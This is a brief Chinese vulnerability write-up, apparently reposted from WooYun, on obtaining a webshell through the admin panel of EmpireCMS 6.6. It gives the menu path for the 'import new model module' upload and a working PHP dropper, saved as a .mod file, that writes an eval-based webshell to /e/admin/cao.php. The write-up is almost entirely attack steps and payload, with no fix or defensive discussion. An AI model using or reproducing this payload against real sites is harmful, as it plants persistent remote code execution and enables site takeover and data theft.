帝国(EmpireCMS)cms 6.6 后台拿shell

简要描述:

以前6.5的有人发的方法是,(进入后台—系统设置—管理数据表—管理系统模型—导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)

详细说明:

以 前6.5的有人发的方法是,(进入后台—系统设置—管理数据表—管理系统模型—导入新型模 块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传 之后会变成类似uploadm1324885505nXmTdQamQq.php这样的!

漏洞证明:

换 了个办法其实也很简 单<?fputs(fopen(“cao.php”,”w”),”<?eval(\$_POST[cmd]);?>”)?> 保存为1.php.mod 然后还是进入后台—系统设置—管理数据表—管理系统模型—导入新型模块,上传之后马儿就躺在了/e/admin/cao.php了

本文转自wooyun由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及原作者版权信息。